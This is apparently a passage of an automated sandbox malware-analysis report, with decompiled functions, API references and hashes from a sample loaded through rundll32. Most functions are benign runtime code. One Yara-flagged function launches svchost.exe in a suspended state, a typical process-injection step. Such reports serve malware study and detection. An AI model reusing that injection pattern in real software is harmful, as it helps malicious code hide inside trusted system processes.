				 *0x1947dc = E0018BE5C("VarR8FromStr", E0018BB24, _t91);
				 *0x1947e0 = E0018BE5C("VarDateFromStr", E0018BB90, _t91);
				 *0x1947e4 = E0018BE5C("VarCyFromStr", E0018BBFC, _t91);
				 *0x1947e8 = E0018BE5C("VarBoolFromStr", E0018BC68, _t91);
				 *0x1947ec = E0018BE5C("VarBstrFromCy", E0018BCE8, _t91);
				 *0x1947f0 = E0018BE5C("VarBstrFromDate", E0018BD58, _t91);
				_t46 = E0018BE5C("VarBstrFromBool", E0018BDC8, _t91);
				 *0x1947f4 = _t46;
				return _t46;
			}






                                            0x0018be96
                                            0x0018beaa
                                            0x0018bec0
                                            0x0018bed6
                                            0x0018beec
                                            0x0018bf02
                                            0x0018bf18
                                            0x0018bf2e
                                            0x0018bf44
                                            0x0018bf5a
                                            0x0018bf70
                                            0x0018bf86
                                            0x0018bf9c
                                            0x0018bfb2
                                            0x0018bfc8
                                            0x0018bfde
                                            0x0018bff4
                                            0x0018c00a
                                            0x0018c020
                                            0x0018c036
                                            0x0018c04c
                                            0x0018c062
                                            0x0018c072
                                            0x0018c078
                                            0x0018c07f

                                            APIs
                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0018BE91
                                              • Part of subcall function 0018BE5C: 7248FFF6.KERNEL32(00000000), ref: 0018BE75
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: 7248HandleModule
                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                            • API String ID: 3866045432-1918263038
                                            • Opcode ID: 10c2210836f76fa484d306e5d5cc53fdb8b6910ed52d7b2db1c459277ac65d15
                                            • Instruction ID: 127109dbee8dd408b16c3e468830e5d5a8bef6d30049e394d3a7c9f040bcfec3
                                            • Opcode Fuzzy Hash: 10c2210836f76fa484d306e5d5cc53fdb8b6910ed52d7b2db1c459277ac65d15
                                            • Instruction Fuzzy Hash: 20414F6160D3099F53087BED7AE186773C8D705B103A0402BB118ABB65EF30AF868F79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018AC00, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E0018AC00(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x18aecb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0018AA8C();
				E001895FC(__ebx, __edi, __esi);
				_t196 =  *0x194748;
				if( *0x194748 != 0) {
					E001897D4(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0018954C(_t43, 0, 0x14,  &_v20);
				E001839D4(0x19467c, _v20);
				E0018954C(_t43, 0x18aee0, 0x1b,  &_v24);
				 *0x194680 = E00186AC0(0x18aee0, 0, _t196);
				E0018954C(_t132, 0x18aee0, 0x1c,  &_v28);
				 *0x194681 = E00186AC0(0x18aee0, 0, _t196);
				 *0x194682 = E00189598(_t132, 0x2c, 0xf);
				 *0x194683 = E00189598(_t132, 0x2e, 0xe);
				E0018954C(_t132, 0x18aee0, 0x19,  &_v32);
				 *0x194684 = E00186AC0(0x18aee0, 0, _t196);
				 *0x194685 = E00189598(_t132, 0x2f, 0x1d);
				E0018954C(_t132, "m/d/yy", 0x1f,  &_v40);
				E00189884(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E001839D4(0x194688, _v36);
				E0018954C(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00189884(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E001839D4(0x19468c, _v44);
				 *0x194690 = E00189598(_t132, 0x3a, 0x1e);
				E0018954C(_t132, 0x18af14, 0x28,  &_v52);
				E001839D4(0x194694, _v52);
				E0018954C(_t132, 0x18af20, 0x29,  &_v56);
				E001839D4(0x194698, _v56);
				E00183980( &_v12);
				E00183980( &_v16);
				E0018954C(_t132, 0x18aee0, 0x25,  &_v60);
				_t104 = E00186AC0(0x18aee0, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00183A18( &_v8, 0x18af38);
				} else {
					E00183A18( &_v8, 0x18af2c);
				}
				E0018954C(_t132, 0x18aee0, 0x23,  &_v64);
				_t111 = E00186AC0(0x18aee0, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0018954C(_t132, 0x18aee0, 0x1005,  &_v68);
					if(E00186AC0(0x18aee0, 0, _t198) != 0) {
						E00183A18( &_v12, 0x18af54);
					} else {
						E00183A18( &_v16, 0x18af44);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00183CDC();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00183CDC();
				 *0x19474a = E00189598(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0018AED2);
				return E001839A4( &_v68, 0x10);
			}

























                                            0x0018ac00
                                            0x0018ac00
                                            0x0018ac01
                                            0x0018ac03
                                            0x0018ac08
                                            0x0018ac08
                                            0x0018ac0a
                                            0x0018ac0c
                                            0x0018ac0c
                                            0x0018ac0f
                                            0x0018ac12
                                            0x0018ac13
                                            0x0018ac18
                                            0x0018ac1b
                                            0x0018ac1e
                                            0x0018ac23
                                            0x0018ac28
                                            0x0018ac2f
                                            0x0018ac31
                                            0x0018ac31
                                            0x0018ac3b
                                            0x0018ac4a
                                            0x0018ac57
                                            0x0018ac6c
                                            0x0018ac7b
                                            0x0018ac90
                                            0x0018ac9f
                                            0x0018acb2
                                            0x0018acc5
                                            0x0018acda
                                            0x0018ace9
                                            0x0018acfc
                                            0x0018ad11
                                            0x0018ad1c
                                            0x0018ad29
                                            0x0018ad3e
                                            0x0018ad49
                                            0x0018ad56
                                            0x0018ad69
                                            0x0018ad7e
                                            0x0018ad8b
                                            0x0018ada0
                                            0x0018adad
                                            0x0018adb5
                                            0x0018adbd
                                            0x0018add2
                                            0x0018addc
                                            0x0018ade1
                                            0x0018ade3
                                            0x0018adfc
                                            0x0018ade5
                                            0x0018aded
                                            0x0018aded
                                            0x0018ae11
                                            0x0018ae1b
                                            0x0018ae20
                                            0x0018ae22
                                            0x0018ae34
                                            0x0018ae45
                                            0x0018ae5e
                                            0x0018ae47
                                            0x0018ae4f
                                            0x0018ae4f
                                            0x0018ae45
                                            0x0018ae63
                                            0x0018ae66
                                            0x0018ae69
                                            0x0018ae6e
                                            0x0018ae7b
                                            0x0018ae80
                                            0x0018ae83
                                            0x0018ae86
                                            0x0018ae8b
                                            0x0018ae98
                                            0x0018aeab
                                            0x0018aeb2
                                            0x0018aeb5
                                            0x0018aeb8
                                            0x0018aeca

                                            APIs
                                            • GetThreadLocale.KERNEL32(00000000,0018AECB,?,?,00000000,00000000), ref: 0018AC36
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                            • API String ID: 4232894706-2493093252
                                            • Opcode ID: 6b00977d40f1505c5b6222bf8e16c27a23d407878e7a468d71dd3d5c7c69086b
                                            • Instruction ID: 0baa4a12cec56b7fad1e9a3409554ed35d27c73e47b36d26dba2bb28344450e5
                                            • Opcode Fuzzy Hash: 6b00977d40f1505c5b6222bf8e16c27a23d407878e7a468d71dd3d5c7c69086b
                                            • Instruction Fuzzy Hash: 26615270B001089BEB05FBA4DD91AEE77AA9F99300F548436F201AB746CB39DF069F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0018CFF4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E0018CFF4(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0018CC34(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0018B9E8();
					return E0018CC34(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0018BE3C();
						_t113 = _t54;
						if(_t113 == 0) {
							E0018C98C(_t100);
						}
						E0018CF4C(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0018CF68(_v788 - 1, _t115) != 0) {
								L0018BE54();
								E0018CC34(_v792);
								L0018BE54();
								E0018CC34( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0018CF98(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0018BE44();
							E0018CC34(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0018BE4C();
							E0018CC34(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                            0x0018cff4
                                            0x0018d000
                                            0x0018d006
                                            0x0018d008
                                            0x0018d012
                                            0x0018d019
                                            0x0018d019
                                            0x0018d01e
                                            0x0018d02c
                                            0x0018d1a5
                                            0x0018d1ac
                                            0x0018d1ad
                                            0x00000000
                                            0x0018d032
                                            0x0018d035
                                            0x0018d047
                                            0x0018d037
                                            0x0018d03c
                                            0x0018d03c
                                            0x0018d056
                                            0x0018d062
                                            0x0018d065
                                            0x0018d0d2
                                            0x0018d0d8
                                            0x0018d0d9
                                            0x0018d0df
                                            0x0018d0e0
                                            0x0018d0e2
                                            0x0018d0e7
                                            0x0018d0eb
                                            0x0018d0ed
                                            0x0018d0ed
                                            0x0018d0f8
                                            0x0018d103
                                            0x0018d10e
                                            0x0018d117
                                            0x0018d11a
                                            0x0018d136
                                            0x0018d13d
                                            0x0018d148
                                            0x0018d15f
                                            0x0018d164
                                            0x0018d178
                                            0x0018d17d
                                            0x0018d190
                                            0x0018d190
                                            0x0018d199
                                            0x0018d11c
                                            0x0018d11c
                                            0x0018d11d
                                            0x0018d123
                                            0x0018d129
                                            0x0018d12b
                                            0x0018d12d
                                            0x0018d130
                                            0x0018d133
                                            0x0018d133
                                            0x0018d136
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0018d136
                                            0x0018d067
                                            0x0018d067
                                            0x0018d068
                                            0x0018d06a
                                            0x0018d070
                                            0x0018d072
                                            0x0018d081
                                            0x0018d082
                                            0x0018d08c
                                            0x0018d08d
                                            0x0018d092
                                            0x0018d09d
                                            0x0018d09e
                                            0x0018d0a8
                                            0x0018d0a9
                                            0x0018d0ae
                                            0x0018d0c9
                                            0x0018d0cb
                                            0x0018d0cc
                                            0x0018d0cf
                                            0x0018d0cf
                                            0x00000000
                                            0x0018d070
                                            0x0018d065

                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0018D08D
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0018D0A9
                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0018D0E2
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0018D15F
                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0018D178
                                            • VariantCopy.OLEAUT32(?), ref: 0018D1AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                            • String ID:
                                            • API String ID: 351091851-3916222277
                                            • Opcode ID: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                            • Instruction ID: c0ee33dc5cb862b8162b2ea9a257f13202beed9eecad0e1e1b093cb118523b0b
                                            • Opcode Fuzzy Hash: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                            • Instruction Fuzzy Hash: 3651E87590162D9FCB26EB68D881BD9B3BDAF58300F4041D5F608E7242DB74AF858FA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00183804, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E00183804(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x194044 == 0) {
					if( *0x19302c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x194218 == 0xd7b2 &&  *0x194220 > 0) {
						 *0x194230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E0018388C, 2,  &_v4, 0);
				}
			}





                                            0x0018380c
                                            0x0018386c
                                            0x0018387c
                                            0x0018387c
                                            0x00183882
                                            0x0018380e
                                            0x00183817
                                            0x00183827
                                            0x00183827
                                            0x00183843
                                            0x00183864
                                            0x00183864

                                            APIs
                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00192E04,00000000,?,001838D2,?,?,00194630,?,?,001930B4,0018561D,00192E04), ref: 0018383D
                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00192E04), ref: 00183843
                                            • GetStdHandle.KERNEL32(000000F5,0018388C,00000002,00192E04,00000000,00000000,?,001838D2,?,?,00194630,?,?,001930B4,0018561D,00192E04), ref: 00183858
                                            • WriteFile.KERNEL32(00000000,000000F5,0018388C,00000002,00192E04), ref: 0018385E
                                            • MessageBoxA.USER32 ref: 0018387C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileHandleWrite$Message
                                            • String ID: Error$Runtime error at 00000000
                                            • API String ID: 1570097196-2970929446
                                            • Opcode ID: 10d042c47066e83017fd8e85cba9ecf66fdccb038a9d2377e8b242a91476bb65
                                            • Instruction ID: 7f0bfe29fde91f219c3af5a5d880a8dc7ae8ffda524a5e5a673efbc2ec2db9f9
                                            • Opcode Fuzzy Hash: 10d042c47066e83017fd8e85cba9ecf66fdccb038a9d2377e8b242a91476bb65
                                            • Instruction Fuzzy Hash: 55F02EA2A803083AEB20B374BC0BF59221CA316F15F28471AB330680D6C7E04BC69F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00189C40, Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00189C40(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E00189AB8(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x193514; // 0x194044
				if( *_t14 == 0) {
					_t16 =  *0x19340c; // 0x18592c
					_t9 = _t16 + 4; // 0xffe8
					_t18 =  *0x194660; // 0x180000
					LoadStringA(E00184840(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 = E00193430; // 0x194214
				E0018271C(E00182854(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00186F00( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x189d04, 2,  &_v1092, 0);
			}












                                            0x00189c4f
                                            0x00189c54
                                            0x00189c5c
                                            0x00189cc3
                                            0x00189cc8
                                            0x00189ccc
                                            0x00189cd7
                                            0x00000000
                                            0x00189ced
                                            0x00189c5e
                                            0x00189c68
                                            0x00189c77
                                            0x00189c87
                                            0x00189c9a
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00189AB8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                              • Part of subcall function 00189AB8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                              • Part of subcall function 00189AB8: GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
                                              • Part of subcall function 00189AB8: LoadStringA.USER32 ref: 00189BAA
                                            • CharToOemA.USER32 ref: 00189C77
                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00189C94
                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00189C9A
                                            • GetStdHandle.KERNEL32(000000F4,00189D04,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 00189CAF
                                            • WriteFile.KERNEL32(00000000,000000F4,00189D04,00000002,?), ref: 00189CB5
                                            • LoadStringA.USER32 ref: 00189CD7
                                            • MessageBoxA.USER32 ref: 00189CED
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                            • String ID:
                                            • API String ID: 185507032-0
                                            • Opcode ID: 3340e7e5b14ee44cbafcb8a49791b1a37bf5590ccf5e0d787152e9cda0090507
                                            • Instruction ID: 3d914bda600e39c9a6e9e4f82915e3d3b2af8d55a9a0f7883d841c26edccb948
                                            • Opcode Fuzzy Hash: 3340e7e5b14ee44cbafcb8a49791b1a37bf5590ccf5e0d787152e9cda0090507
                                            • Instruction Fuzzy Hash: 6B1170B2154204AED700F794DC82F9B77ECAB55700F808516B754D70E2DB70EB448F66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001C2C40, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47processstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001C2C40(void** _a4, intOrPtr* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				char _v348;

				E001C14A0( &_v88, 0, 0x44);
				_v88.cb = 0x44;
				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
				lstrcatA( &_v348, "\\System32\\svchost.exe");
				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
					 *_a4 = _v20.hProcess;
					 *_a8 = _v20.hThread;
					return 1;
				}
				return 0;
			}






                                            0x001c2c51
                                            0x001c2c59
                                            0x001c2c71
                                            0x001c2c83
                                            0x001c2cb1
                                            0x001c2cbd
                                            0x001c2cc5
                                            0x00000000
                                            0x001c2cc7
                                            0x00000000

                                            APIs
                                            • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 001C2C71
                                            • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 001C2C83
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 001C2CA9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateEnvironmentProcessVariablelstrcat
                                            • String ID: D$SystemRoot$\System32\svchost.exe
                                            • API String ID: 3510847443-1175289849
                                            • Opcode ID: a472c2e132e29c18831a00b27ff3670320664c3c682e963ca08aed91ccd02d59
                                            • Instruction ID: a8a7874e1bb604df64787b91e8384667d5ec7a407dcc174286ae78a006256d18
                                            • Opcode Fuzzy Hash: a472c2e132e29c18831a00b27ff3670320664c3c682e963ca08aed91ccd02d59
                                            • Instruction Fuzzy Hash: 1F015271A84308ABE710CFD0DC46FE97778EB54705F104058FB09AE2C0E7B4AA488B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00181A2C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 72%
                                            			E00181A2C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x1945bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00181B02);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x194045 != 0) {
						_push(0x1945c4);
						L001812C4();
					}
					 *0x1945bc = 0;
					_t3 =  *0x19461c; // 0x3d76a8
					LocalFree(_t3);
					 *0x19461c = 0;
					_t19 =  *0x1945e4; // 0x3d8cdc
					while(_t19 != 0x1945e4) {
						_t1 = _t19 + 8; // 0x1fd0000
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E0018132C(0x1945e4);
					E0018132C(0x1945f4);
					E0018132C(0x194620);
					_t14 =  *0x1945dc; // 0x3d86a8
					while(_t14 != 0) {
						 *0x1945dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x1945dc; // 0x3d86a8
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x181b09);
					if( *0x194045 != 0) {
						_push(0x1945c4);
						L001812CC();
					}
					_push(0x1945c4);
					L001812D4();
					return 0;
				}
			}










                                            0x00181a2d
                                            0x00181a37
                                            0x00181b0b
                                            0x00181a3d
                                            0x00181a3f
                                            0x00181a40
                                            0x00181a45
                                            0x00181a48
                                            0x00181a52
                                            0x00181a54
                                            0x00181a59
                                            0x00181a59
                                            0x00181a5e
                                            0x00181a65
                                            0x00181a6b
                                            0x00181a72
                                            0x00181a77
                                            0x00181a91
                                            0x00181a86
                                            0x00181a8a
                                            0x00181a8f
                                            0x00181a8f
                                            0x00181a9e
                                            0x00181aa8
                                            0x00181ab2
                                            0x00181ab7
                                            0x00181abe
                                            0x00181ac2
                                            0x00181ac9
                                            0x00181ace
                                            0x00181ad3
                                            0x00181ad9
                                            0x00181adc
                                            0x00181adf
                                            0x00181aeb
                                            0x00181aed
                                            0x00181af2
                                            0x00181af2
                                            0x00181af7
                                            0x00181afc
                                            0x00181b01
                                            0x00181b01

                                            APIs
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,00000000,00181B02), ref: 00181A59
                                            • LocalFree.KERNEL32(003D76A8,00000000,00181B02), ref: 00181A6B
                                            • VirtualFree.KERNEL32(01FD0000,00000000,00008000,003D76A8,00000000,00181B02), ref: 00181A8A
                                            • LocalFree.KERNEL32(003D86A8,01FD0000,00000000,00008000,003D76A8,00000000,00181B02), ref: 00181AC9
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,00181B09,003D76A8,00000000,00181B02), ref: 00181AF2
                                            • RtlDeleteCriticalSection.KERNEL32(001945C4,00181B09,003D76A8,00000000,00181B02), ref: 00181AFC
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                            • String ID:
                                            • API String ID: 3782394904-0
                                            • Opcode ID: 2b3347b9bd43728b970b18b7b2d21013aec4d1ba9aa51e48791c1a3070cdfaed
                                            • Instruction ID: ab004992efacd136f46bf6d73b70795b231a6346581ee702b7c057cebf6bedc5
                                            • Opcode Fuzzy Hash: 2b3347b9bd43728b970b18b7b2d21013aec4d1ba9aa51e48791c1a3070cdfaed
                                            • Instruction Fuzzy Hash: 7111DDB6A042807FEB29FBE5EC92F5677DDAB16700F558016F10487A91D7249E83CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 001853B9, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E001853B9(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				signed int _t6;
				signed int _t7;
				long _t10;
				void* _t14;

				_t14 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x1945b4)) =  *((intOrPtr*)(__eax - 0x1945b4)) + __eax - 0x1945b4;
				 *0x193008 = 2;
				 *0x194014 = 0x181168;
				 *0x194018 = 0x181170;
				 *0x194046 = 2;
				 *0x194000 = E00184578;
				if(E00182CB4() != 0) {
					_t3 = E00182CE4();
				}
				E00182DA8(_t3);
				 *0x19404c = 0xd7b0;
				 *0x194218 = 0xd7b0;
				 *0x1943e4 = 0xd7b0;
				 *0x19403c = GetCommandLineA();
				_t6 = E00181278();
				 *0x194038 = _t6;
				L00181270();
				_t7 = _t6 & 0x80000000;
				if(_t7 == 0x80000000) {
					 *0x1945b8 = E001852F0(GetThreadLocale(), _t14, __eflags);
				} else {
					L00181270();
					if((_t7 & 0x000000ff) <= 4) {
						 *0x1945b8 = E001852F0(GetThreadLocale(), _t14, __eflags);
					} else {
						 *0x1945b8 = 3;
					}
				}
